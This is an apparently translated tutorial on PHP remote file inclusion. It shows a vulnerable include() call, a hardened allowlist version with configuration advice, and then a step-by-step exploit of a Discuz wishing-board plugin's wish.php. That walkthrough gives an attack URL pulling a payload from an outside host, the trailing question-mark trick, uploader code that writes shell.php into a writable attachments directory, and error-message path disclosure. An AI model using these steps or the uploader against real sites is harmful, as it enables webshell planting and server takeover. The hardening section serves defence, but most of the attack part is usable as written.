Suppose the main page file, index.php, contains the following code:
<?
include($page);
?>
Because the $page variable is not adequately filtered, the system does not determine whether $page refers to a local file or to a file on a remote server. We can therefore specify a file on a remote server and submit it as the $page parameter, which lets us execute our remote file with the web server's permissions.
In this way, we can submit:
http://www.bkjia.com/index.php?page=http://remote server/file name
We only need to set the remote file as our PHP Trojan so that we can get a Webshell.
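A hardened form of the index.php above, added here as an example and not taken from the original article: the request value is only used as a key into a fixed allowlist, so neither a remote URL nor a traversal string ever reaches include. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration; the code targets PHP 8.

```php
<?php
// Added example, not the article's code. PAGE_DIR, PAGES and resolve_page()
// are hypothetical names chosen for this illustration.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file under PAGE_DIR. Nothing else is includable.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

/**
 * Map a user-supplied page name to a local file path, or null if rejected.
 */
function resolve_page(mixed $page): ?string
{
    // Rejects arrays (?page[]=x), URLs such as "http://host/file?" and
    // traversal strings such as "../../etc/passwd": none is an allowlist key.
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;
    }

    // Defence in depth: canonicalise and confirm the target really lives
    // inside PAGE_DIR (catches symlinks or a bad allowlist entry).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$page]);
    if ($base === false || $path === false) {
        return null;
    }
    if (!str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['page'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```

Keeping allow_url_include = Off in php.ini (its default value) blocks the remote-URL case on its own, but it does not stop inclusion of unintended local files, so the allowlist is still needed.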
Let's look at the discuz wishing board's Remote File Inclusion Vulnerability:
The problem is in the wish.php file of the wishing pool plug-in:
require $discuz_root.'./include/discuzcode.func.php';
The discuz_root variable is not strictly filtered. Usage:
http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt?
The .txt suffix is not required; any suffix works. The trailing question mark is required: it turns the path that the script appends (./include/discuzcode.func.php) into a query string, so the remote server still returns wyt.txt.
Here wyt.txt uses CN.Tink's small uploader (the "pony") to write a shell:
<? copy($_FILES[MyFile][tmp_name], "./attachments/shell.php"); ?>
<form enctype="multipart/form-data" action="" method="POST">
<input name="MyFile" type="file">
<input value="submit" type="submit">
</form>
The site's physical path can be obtained by submitting http://url/wish.php?discuz_root=http://www.wang1.cn/wyt.txt and reading the error message; then modify the path in shell.txt accordingly. shell.php is the name of the uploaded shell.
Unix permission settings are comparatively strict, but the ./attachments/ directory is generally writable.